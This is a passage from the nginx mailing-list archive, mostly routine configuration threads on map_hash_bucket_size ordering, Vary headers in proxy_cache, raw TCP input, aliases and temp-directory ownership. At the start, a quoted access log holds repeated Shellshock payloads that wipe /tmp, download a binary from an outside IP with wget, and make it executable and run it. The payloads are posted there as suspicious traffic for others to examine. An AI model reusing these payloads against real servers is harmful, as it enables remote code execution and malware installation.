184 "() > { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 > -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >> > /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo > /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> > /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c > \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O > /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >> > /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo > /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> > /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" > > 61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "() > { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 > -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >> > /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo > /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> > /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c > \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O > /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >> > /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo > /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> > /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" > > 61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "() > { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 > -O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >> > /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo > /tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> > /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c > \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb >>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 > /tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >> > /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 > /tmp/Run.sh;/tmp/Run.sh\x22" "-" > > Error.log > > 2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed > keepalive connection > 2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed > keepalive connection > 2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed > keepalive connection > 2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed > keepalive connection > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From lists at ssl-mail.com Sat Oct 22 17:29:29 2016 From: lists at ssl-mail.com (lists at ssl-mail.com) Date: Sat, 22 Oct 2016 10:29:29 -0700 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? In-Reply-To: <1fa6642434bea5376cefcfe8f1888f46.NginxMailingListEnglish@forum.nginx.org> References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> <1fa6642434bea5376cefcfe8f1888f46.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1477157369.3014761.764105609.0A017BE4@webmail.messagingengine.com> On Sat, Oct 22, 2016, at 09:42 AM, itpp2012 wrote: > Syntax: map_hash_bucket_size size; > Default: map_hash_bucket_size 32|64|128; > Context: http > > The err message is valid but may be misleading due to the places you used, a > dup msg does not indicate the valid context area. Sorry, but ... "Huh?" 'valid' context per your own post is "http", as well as docs http://nginx.org/en/docs/http/ngx_http_map_module.html#map_hash_bucket_size My snippet clearly shows its use in http(). From nginx-forum at forum.nginx.org Sat Oct 22 20:21:10 2016 From: nginx-forum at forum.nginx.org (janro) Date: Sat, 22 Oct 2016 16:21:10 -0400 Subject: Suspicious log records In-Reply-To: <80A04B68-F3CA-4007-89DA-7A528EAFE3D4@fearnothingproductions.net> References: <80A04B68-F3CA-4007-89DA-7A528EAFE3D4@fearnothingproductions.net> Message-ID: Thank you for your answer Robert! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270484#msg-270484 From lists at lazygranch.com Sat Oct 22 21:19:49 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 22 Oct 2016 14:19:49 -0700 Subject: Hacker log Message-ID: <20161022141949.36d31d25@linux-h57q.site> http://pastebin.com/7W0uDrLa If you need an extensive list of hacker requests (over 200), I put this log entry on pastebin. As mentioned at the top of the pastebin, the hacker used my IP address directly rather than my doman name. I have a "map" that detects typical hacker activity. Perhaps in my "map" of triggers, I should look for bypassing the domain name, that is requests directly to my IP address. There is nothing particularly evil in using my IP address rather than domain name, but would any real user ever use my IP address? Kind of doubtful. From nginx-forum at forum.nginx.org Sat Oct 22 21:40:56 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Sat, 22 Oct 2016 17:40:56 -0400 Subject: Hacker log In-Reply-To: <20161022141949.36d31d25@linux-h57q.site> References: <20161022141949.36d31d25@linux-h57q.site> Message-ID: The idea is nice but pointless, if you maintain this list over 6 months you most likely will end up blocking just about everyone. Stick to common sense with your config, lock down nginx and the backends, define proper flood and overflow settings for nginx to deal with, anything beyond the scope of nginx should be dealt with by your ISP perimeter systems. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270485,270486#msg-270486 From lists at lazygranch.com Sat Oct 22 22:17:24 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 22 Oct 2016 15:17:24 -0700 Subject: Hacker log In-Reply-To: References: <20161022141949.36d31d25@linux-h57q.site> Message-ID: <20161022151724.5c94ac3f@linux-h57q.site> On Sat, 22 Oct 2016 17:40:56 -0400 "itpp2012" wrote: > The idea is nice but pointless, if you maintain this list over 6 > months you most likely will end up blocking just about everyone. > > Stick to common sense with your config, lock down nginx and the > backends, define proper flood and overflow settings for nginx to deal > with, anything beyond the scope of nginx should be dealt with by your > ISP perimeter systems. > > Posted at Nginx Forum: > https://forum.nginx.org/read.php?2,270485,270486#msg-270486 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx I've been doing this for more than six months. Clearly I haven't blocked everyone. ;-) These requests would just go to 404 if I didn't trap them. I rather save 404 for real missing links. My attitude regarding hacking is if it comes from a place without eyeballs (hosting, colo, etc.), enjoy your lifetime ban. This keeps the logs cleaner. Dumb hacking attempts like that clown could be some real attack in the future, so better to block them. At the very least, you could block all well known cloud services. AWS for example, but not from email ports. From lucas at lucasrolff.com Mon Oct 24 04:38:25 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Mon, 24 Oct 2016 06:38:25 +0200 Subject: Rewrite Vary header before stored in proxy_cache Message-ID: Hi guys, I'm building a small nginx reverse proxy to take care of a bunch of static files for my clients - and it works great. One thing I'm facing though is that some client sites sent "Vary: Accept-Encoding, User-Agent" - which gives an awful cache hit rate - since proxy_cache takes this into account, unless I use something like "proxy_ignore_headers Vary;" But ignoring Vary headers can cause other issues such as gzipped content being sent to a non-gzip client. So I'm looking for a way to basically rewrite the vary header to "Vary: Accept-Encoding" before storing it in proxy_cache - but I wonder if this is even possible in nginx, and if yes - can you give any pointers? I found a temporary fix, and that is to ignore the Vary header, and using a custom variable as a part of the cache key, that is either "", "gzip" or "deflate" (I use a map to look at the Accept-Encoding header from the client). This works great - but I rather keep the cache key a bit clean (since I'll use it later) Do you guys have any recommendations how to make this happen? Also as a side note, if I remove the custom variable from the cache key, how would one actually purge the file then? I assume I have to send different purge requests, since the cached file is based on the Vary: accept-encoding - so I'd have to purge at least the amount of cached encodings right? Also I could opt for another way, and that's always requesting a uncompressed file from the origin (Is it simply not sending the accept-encoding header, or should I do something else?), and then on every request either decide to gzip it or not - the downside I see here, is the fact that most clients request gzip,deflate content, so having to compress on every request will use additional CPU resources. Thanks in advance! -- Best regards, Lucas Rolff -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Oct 24 12:20:34 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 24 Oct 2016 15:20:34 +0300 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? In-Reply-To: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> Message-ID: <20161024122034.GM73038@mdounin.ru> Hello! On Sat, Oct 22, 2016 at 09:30:21AM -0700, lists at ssl-mail.com wrote: > I have a working nginx/1.11.5 instance, with this in config > > ... > http( > ... > 134 map_hash_bucket_size 4096; > > ... > ) > ... > > when I add geoip blocking > > ... > http ( > + geoip_country /var/lib/GeoIP/GeoIP.dat; > + map $geoip_country_code $allowed_country { > + default yes; > + XX no; # some country > ... > 134 map_hash_bucket_size 4096; > > ... > ) > ... > > config check now reports > > nginx: [emerg] "map_hash_bucket_size" directive is duplicate in /etc/nginx/nginx.conf:134 > > simply commenting out > > - map_hash_bucket_size 4096; > + #map_hash_bucket_size 4096; > > fixes the config error. > > Why can't 'map_hash_bucket_size' be set in the presence of the geoip_country snippet? > > Config error? Bug? other? It's not relevant to geoip_country, but rather to the map{} block before the map_hash_bucket_size directive. Something like map $uri $foo {} map_hash_bucket_size 4096; is enough to trigger the error, as the map{} block requires some hash bucket size to be set. And if it is not set when parsing a map{} block, it is automatically configures bucket size to a default value. An attempt to redefine bucket size later will trigger the error, and this is what happens with the above configuration. The message is a bit misleading in this particular situation as it is a generic one. Though the fact that the configuration is rejected is correct: nginx can't use the value specified in the map_hash_bucket_size directive, and hence it is expected to reject the configuration. An obvious solution would be to specify map_hash_bucket_size before the map{} block, i.e.: map_hash_bucket_size 4096; map $uri $foo {} -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Mon Oct 24 12:49:23 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 24 Oct 2016 15:49:23 +0300 Subject: Rewrite Vary header before stored in proxy_cache In-Reply-To: References: Message-ID: <20161024124923.GN73038@mdounin.ru> Hello! On Mon, Oct 24, 2016 at 06:38:25AM +0200, Lucas Rolff wrote: > Hi guys, > > I'm building a small nginx reverse proxy to take care of a bunch of static > files for my clients - and it works great. > > One thing I'm facing though is that some client sites sent "Vary: > Accept-Encoding, User-Agent" - which gives an awful cache hit rate - since > proxy_cache takes this into account, unless I use something like > "proxy_ignore_headers Vary;" > > But ignoring Vary headers can cause other issues such as gzipped content > being sent to a non-gzip client. > > So I'm looking for a way to basically rewrite the vary header to "Vary: > Accept-Encoding" before storing it in proxy_cache - but I wonder if this is > even possible in nginx, and if yes - can you give any pointers? > > I found a temporary fix, and that is to ignore the Vary header, and using a > custom variable as a part of the cache key, that is either "", "gzip" or > "deflate" (I use a map to look at the Accept-Encoding header from the > client). > > This works great - but I rather keep the cache key a bit clean (since I'll > use it later) > > Do you guys have any recommendations how to make this happen? The best possible solution I can think of is to ask the client to fix the Vary header it returns. Using User-Agent in Vary is something one shouldn't use without a very good reason, and if there a reason - it's likely a bad idea to strip from the Vary header. And if there are no reasons, then it shouldn't be returned in the first place. > Also as a side note, if I remove the custom variable from the cache key, > how would one actually purge the file then? I assume I have to send > different purge requests, since the cached file is based on the Vary: > accept-encoding - so I'd have to purge at least the amount of cached > encodings right? When using purge as availalbe in nginx-plus (http://nginx.org/r/proxy_cache_purge), it takes care of removing all cached variants, much like it does for wildcard purge requests. > Also I could opt for another way, and that's always requesting a > uncompressed file from the origin (Is it simply not sending the > accept-encoding header, or should I do something else?), and then on every > request either decide to gzip it or not - the downside I see here, is the > fact that most clients request gzip,deflate content, so having to compress > on every request will use additional CPU resources. This can be done easily, just proxy_set_header Accept-Encoding ""; should be enough. Alternatively, you can use proxy_set_header Accept-Encoding gzip; gunzip on; to always ask gzipped resources and gunzip them when needed, see http://nginx.org/en/docs/http/ngx_http_gunzip_module.html. -- Maxim Dounin http://nginx.org/ From dragon_nat at hotmail.com Mon Oct 24 12:56:44 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Mon, 24 Oct 2016 12:56:44 +0000 Subject: Receive raw data Message-ID: Dear all I have electronic device and I config to send TCP/IP data to my server by raw data no http header. My server use nginx with fastcgi for webserver and develop my application for get message from port 8080. But nginx always response with error 400 with "client sent invalid method while reading client request line". I know cause my electronic device not have correct header in packet. So I try add "ignore_invalid_headers off;" in http scope but not work. I need to bypass raw data to my application. Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From r1ch+nginx at teamliquid.net Mon Oct 24 15:25:08 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Mon, 24 Oct 2016 17:25:08 +0200 Subject: Receive raw data In-Reply-To: References: Message-ID: Nginx will need a valid header in order to know what to do with the request. Maybe you should look into the stream module instead. https://nginx.org/en/docs/stream/ngx_stream_core_module.html On Mon, Oct 24, 2016 at 2:56 PM, Nattakorn S wrote: > Dear all > > > I have electronic device and I config to send TCP/IP data to my server by > raw data no http header. > > My server use nginx with fastcgi for webserver and develop > my application for get message from port 8080. > > But nginx always response with error 400 with "client sent invalid method > while reading client request line". > > I know cause my electronic device not have correct header in packet. > > So I try add "ignore_invalid_headers off;" in http scope but not work. > > I need to bypass raw data to my application. > > > Thank you. > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at ssl-mail.com Mon Oct 24 16:08:57 2016 From: lists at ssl-mail.com (lists at ssl-mail.com) Date: Mon, 24 Oct 2016 09:08:57 -0700 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? In-Reply-To: <20161024122034.GM73038@mdounin.ru> References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> <20161024122034.GM73038@mdounin.ru> Message-ID: <1477325337.1841467.765652673.2B5CD46F@webmail.messagingengine.com> On Mon, Oct 24, 2016, at 05:20 AM, Maxim Dounin wrote: > It's not relevant to geoip_country, but rather to the map{} block > before the map_hash_bucket_size directive. Something like > > map $uri $foo {} > map_hash_bucket_size 4096; > > is enough to trigger the error, as the map{} block requires some > hash bucket size to be set. And if it is not set when parsing a > map{} block, it is automatically configures bucket size to a > default value. An attempt to redefine bucket size later will > trigger the error, and this is what happens with the above > configuration. > > The message is a bit misleading in this particular situation > as it is a generic one. Though the fact that the configuration is > rejected is correct: nginx can't use the value specified in the > map_hash_bucket_size directive, and hence it is expected to reject > the configuration. > > An obvious solution would be to specify map_hash_bucket_size > before the map{} block, i.e.: > > map_hash_bucket_size 4096; > map $uri $foo {} Clearly explained, and the 'solution', of simply ordering the commands as above, works as promised. Once you understand what's going on, "directive is duplicate in" actually makes sense. Curious, did I miss this ^^ fact in the docs somewhere? Obviously not critical, but a more clearly descriptive/relevant error would be nice .... Thanks. From francis at daoine.org Mon Oct 24 17:02:51 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 24 Oct 2016 18:02:51 +0100 Subject: Problem with cache key In-Reply-To: <7ce0c8b0fd6b5cce9d489fa692315728.NginxMailingListEnglish@forum.nginx.org> References: <20161018191240.GL11677@daoine.org> <7ce0c8b0fd6b5cce9d489fa692315728.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161024170251.GN11677@daoine.org> On Wed, Oct 19, 2016 at 06:05:54AM -0400, CarstenK. wrote: Hi there, > I took a look at the header nginx response. > Vary: Accept-Encoding > Vary: Accept-Encoding So they both vary based on Accept-Encoding. When I do a quick test of my versions of curl, Chrome, and Firefox, I see no Accept-Encoding header for curl, "gzip, deflate, sdch, br" for Chrome, and "gzip, deflate" for Firefox. Those are three different values, and upstream presumably says that the response depends on the value, so the cached version for one should not be returned in response to another. > How can i have a look for the headers of upstream servers? >From nginx to upstream - you could check the nginx debug log (I think), or the upstream log, or possibly "tcpdump" the traffic to see what exactly is happening. In this case, it is probably the client request to nginx that is showing the different headers. For that, you could check the nginx debug log, or "tcpdump" that traffic. There is a now-parallel thread at https://forum.nginx.org/read.php?2,270496,270510 which shows a way to "normalise" the Accept-Encoding headers that are sent to upstream. That would be at the cost of (e.g.) not being able to serve sdch- or br-encoded content to the Chrome that asked for it. Cheers, f -- Francis Daly francis at daoine.org From lucas at lucasrolff.com Mon Oct 24 17:25:24 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Mon, 24 Oct 2016 19:25:24 +0200 Subject: Rewrite Vary header before stored in proxy_cache In-Reply-To: <20161024124923.GN73038@mdounin.ru> References: <20161024124923.GN73038@mdounin.ru> Message-ID: <580E4404.3030008@lucasrolff.com> Hi Maxim, Thank you a lot for the reply! > The best possible solution I can think of is to ask the client to fix the Vary header it returns I completely agree, but sometimes it's hard to ask customers to do this, but I do try to do it as often as possible. > When using purge as availalbe in nginx-plus (http://nginx.org/r/proxy_cache_purge), it takes care of removing all cached variants, much like it does for wildcard purge requests. Ahh cool! Nice one - maybe we'll be lucky that it gets to the open source version one day ;) > This can be done easily, just > > proxy_set_header Accept-Encoding ""; > > should be enough. Alternatively, you can use > > proxy_set_header Accept-Encoding gzip; > gunzip on; > > to always ask gzipped resources and gunzip them when needed, see > http://nginx.org/en/docs/http/ngx_http_gunzip_module.html. This is actually what I ended up doing, and it seems to work perfectly - still I have to gunzip if the client doesn't support gzip in first place, but the percentage is very minimal these days, so it seems like the best option, not only I save a bunch of storage (due to compression and only storing the file once and not 3 times) - but also makes purging super easy! Once again, thanks a lot! -- Best Regards, Lucas Rolff Maxim Dounin wrote: > Hello! > > On Mon, Oct 24, 2016 at 06:38:25AM +0200, Lucas Rolff wrote: > >> Hi guys, >> >> I'm building a small nginx reverse proxy to take care of a bunch of static >> files for my clients - and it works great. >> >> One thing I'm facing though is that some client sites sent "Vary: >> Accept-Encoding, User-Agent" - which gives an awful cache hit rate - since >> proxy_cache takes this into account, unless I use something like >> "proxy_ignore_headers Vary;" >> >> But ignoring Vary headers can cause other issues such as gzipped content >> being sent to a non-gzip client. >> >> So I'm looking for a way to basically rewrite the vary header to "Vary: >> Accept-Encoding" before storing it in proxy_cache - but I wonder if this is >> even possible in nginx, and if yes - can you give any pointers? >> >> I found a temporary fix, and that is to ignore the Vary header, and using a >> custom variable as a part of the cache key, that is either "", "gzip" or >> "deflate" (I use a map to look at the Accept-Encoding header from the >> client). >> >> This works great - but I rather keep the cache key a bit clean (since I'll >> use it later) >> >> Do you guys have any recommendations how to make this happen? > > The best possible solution I can think of is to ask the client to fix > the Vary header it returns. Using User-Agent in Vary is something > one shouldn't use without a very good reason, and if there a > reason - it's likely a bad idea to strip from the Vary header. > And if there are no reasons, then it shouldn't be returned in the > first place. > >> Also as a side note, if I remove the custom variable from the cache key, >> how would one actually purge the file then? I assume I have to send >> different purge requests, since the cached file is based on the Vary: >> accept-encoding - so I'd have to purge at least the amount of cached >> encodings right? > > When using purge as availalbe in nginx-plus > (http://nginx.org/r/proxy_cache_purge), it takes care of removing > all cached variants, much like it does for wildcard purge requests. > >> Also I could opt for another way, and that's always requesting a >> uncompressed file from the origin (Is it simply not sending the >> accept-encoding header, or should I do something else?), and then on every >> request either decide to gzip it or not - the downside I see here, is the >> fact that most clients request gzip,deflate content, so having to compress >> on every request will use additional CPU resources. > > This can be done easily, just > > proxy_set_header Accept-Encoding ""; > > should be enough. Alternatively, you can use > > proxy_set_header Accept-Encoding gzip; > gunzip on; > > to always ask gzipped resources and gunzip them when needed, see > http://nginx.org/en/docs/http/ngx_http_gunzip_module.html. > From nginx-forum at forum.nginx.org Mon Oct 24 18:42:21 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Mon, 24 Oct 2016 14:42:21 -0400 Subject: Rewrite Vary header before stored in proxy_cache In-Reply-To: <580E4404.3030008@lucasrolff.com> References: <580E4404.3030008@lucasrolff.com> Message-ID: Lucas Rolff Wrote: ------------------------------------------------------- > > When using purge as availalbe in nginx-plus > (http://nginx.org/r/proxy_cache_purge), it takes care of removing all > cached variants, much like it does for wildcard purge requests. > Ahh cool! Nice one - maybe we'll be lucky that it gets to the open > source version one day ;) https://github.com/FRiCKLE/ngx_cache_purge/ Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270496,270526#msg-270526 From daniel at linux-nerd.de Mon Oct 24 19:14:27 2016 From: daniel at linux-nerd.de (Daniel) Date: Mon, 24 Oct 2016 21:14:27 +0200 Subject: alias Message-ID: <23A13382-F28E-4502-9777-7536512C7931@linux-nerd.de> hi there, i try to setup a Alias but it seems not working and i didnt know why: server { listen 80; root /var/www/d1/current/web/; server_name localhost; location / { index app.php; add_header Access-Control-Allow-Headers "Origin, X-Requested-With, Content-Type, Accept"; add_header Access-Control-Allow-Origin "*"; if ($request_uri ~* \.(ico|css|js|gif|jpe?g|png|woff)$) { expires 0; break; } if (-f $request_filename) { break; } try_files $uri @rewriteapp; } location @rewriteapp { rewrite ^(.*)$ /app.php/$1 last; } location /en/holidays/shared/images { alias /mnt/nfs/uat; } location ~ ^/proxy\.php(\?|/|$) { fastcgi_pass unix:/var/run/php-fpm/php70u-fpm.sock; fastcgi_split_path_info ^(.+\.php)(.*)$; include fastcgi_params; fastcgi_param SCRIPT_NAME $fastcgi_script_name; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info; fastcgi_buffer_size 128k; fastcgi_buffers 4 256k; fastcgi_busy_buffers_size 256k; add_header Access-Control-Allow-Headers "Origin, X-Requested-With, Content-Type, Accept"; add_header Access-Control-Allow-Origin "*"; # Prevents URIs that include the front controller. This will 404: # http://domain.tld/app.php/some-path # Remove the internal directive to allow URIs like this #internal; } location ~ ^/app\.php(/|$) { fastcgi_pass unix:/var/run/php-fpm/php70u-fpm.sock; fastcgi_split_path_info ^(.+\.php)(/.*)$; include fastcgi_params; fastcgi_param SCRIPT_NAME $fastcgi_script_name; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info; fastcgi_buffer_size 128k; fastcgi_buffers 4 256k; fastcgi_busy_buffers_size 256k; add_header Access-Control-Allow-Headers "Origin, X-Requested-With, Content-Type, Accept"; add_header Access-Control-Allow-Origin "*"; # Prevents URIs that include the front controller. This will 404: # http://domain.tld/app.php/some-path # Remove the internal directive to allow URIs like this internal; } I added exaclty that: location /en/holidays/shared/images { alias /mnt/nfs/uat; } but nginx tries to open the files from document root :-( Anyone any idea what it could be? Cheers Daniel -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Tue Oct 25 13:01:56 2016 From: nginx-forum at forum.nginx.org (hide) Date: Tue, 25 Oct 2016 09:01:56 -0400 Subject: How to delay requests from once unauthorized IP address Message-ID: <96cb472bc3d4389b9111c37be2ec6296.NginxMailingListEnglish@forum.nginx.org> Hello! My Nginx does fastcgi_pass to some CGI application. The CGI application can return HTTP status code 401. I want Nginx to return this status code to the user and prevent the next access of the user to the CGI application for 5 seconds. For example, the user accessed the CGI application through Nginx and got HTTP status code 401 at 17:40:40. Suppose that the IP address of the user is trying to access the CGI application through Nginx for the second time at 17:40:42. I want Nginx to provide that this second request will not reach the CGI application. Then the IP address of the user is trying to access the CGI application through Nginx for the third time at 17:40:46. I want Nginx to let this third request go to the CGI application because 5 seconds have already passed. Suppose that this third request has worked successfully with HTTP status code 200. Then the IP address of the user is trying to access the CGI application through Nginx for the fourth time at 17:40:47. I want Nginx to let this fourth request go to the CGI application because 5 seconds from HTTP code 401 have already passed. Can I do this with Nginx? Thank you if you answer. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270537,270537#msg-270537 From obri at chaostreff.ch Tue Oct 25 14:45:34 2016 From: obri at chaostreff.ch (Daniel Aubry) Date: Tue, 25 Oct 2016 16:45:34 +0200 Subject: Bug? Chown of all default *_temp_path directories at startup? Message-ID: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> Hi all I'm using nginx-full 1.10.2-1~dotdeb+8.1 from dotdeb.org on Debian. nginx -V nginx version: nginx/1.10.2 built with OpenSSL 1.0.1t 3 May 2016 TLS SNI support enabled configure arguments: --with-cc-opt='-g -O2 -fstack-protector-strong -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-file-aio --with-threads --with-http_addition_module --with-http_geoip_module=dynamic --with-http_gunzip_module --with-http_gzip_static_module --with-http_image_filter_module=dynamic --with-http_secure_link_module --with-http_sub_module --with-http_xslt_module=dynamic --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module --add-dynamic-module=/usr/src/builddir/debian/modules/nginx-auth-pam --add-module=/usr/src/builddir/debian/modules/nginx-dav-ext-module --add-module=/usr/src/builddir/debian/modules/nginx-echo --add-module=/usr/src/builddir/debian/modules/nginx-upstream-fair --add-module=/usr/src/builddir/debian/modules/ngx_http_substitutions_filter_module --add-module=/usr/src/builddir/debian/modules/nginx-cache-purge --add-module=/usr/src/builddir/debian/modules/ngx_http_pinba_module --add-module=/usr/src/builddir/debian/modules/nginx-x-rid-header --with-ld-opt=-lossp-uuid I do have several nginx inscances on one Server, they all run as a different users. There is one main nginx instance which runs as the user www-data. *_temp_path is set to a different location for all nginx instances excluding the main instance. The main www-data instance is still using /var/lib/nginx. Configuration example for custom temp dirs: ================================================================ fastcgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/fcgi; scgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/scgi; uwsgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/wsgi; client_body_temp_path /var/www/vhosts/XYZ/tmp/nginx/body; proxy_temp_path /var/www/vhosts/XYZ/tmp/nginx/proxy; ================================================================ Now, let's restart the main nginx. You can see that all files/directories in /var/lib/nginx are owned by www-data:www-data: ================================================================ root at xxxx-web-03:/var/log/nginx# systemctl restart nginx.service root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx total 28 drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. drwx------ 2 www-data www-data 4096 Oct 25 15:03 body drwx------ 2 www-data www-data 4096 Oct 6 14:43 fastcgi drwx------ 9 www-data www-data 4096 Oct 25 10:18 proxy drwx------ 2 www-data www-data 4096 Oct 6 14:43 scgi drwx------ 2 www-data www-data 4096 Oct 6 14:43 uwsgi ================================================================ After restarting nginx-XYZ.service, all files/directories are owned by XYZ: ================================================================ root at xxxx-web-03:/var/log/nginx# systemctl restart nginx-XYZ.service root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx total 28 drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. drwx------ 2 XYZ www-data 4096 Oct 25 15:03 body drwx------ 2 XYZ www-data 4096 Oct 6 14:43 fastcgi drwx------ 9 XYZ www-data 4096 Oct 25 10:18 proxy drwx------ 2 XYZ www-data 4096 Oct 6 14:43 scgi drwx------ 2 XYZ www-data 4096 Oct 6 14:43 uwsgi root at xxxx-web-03:/var/log/nginx# ================================================================ I can't find the string /var/lib/nginx in any nginx Configuration file on the system: ================================================================ root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx-XYZ/ root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx/ root at xxxx-web-03:/var/log/nginx# ================================================================ I can set all *_temp_path directories of the www-data nginx to an other direcory, this is my current workaround for this issue. But i believe that the nginx shouldn't touch /var/lib/ngin/* if this directory isn't in the configuration file. Any idea? Should i open a bug? Best Regards Daniel From mdounin at mdounin.ru Tue Oct 25 15:10:09 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 25 Oct 2016 18:10:09 +0300 Subject: Bug? Chown of all default *_temp_path directories at startup? In-Reply-To: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> References: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> Message-ID: <20161025151009.GW73038@mdounin.ru> Hello! On Tue, Oct 25, 2016 at 04:45:34PM +0200, Daniel 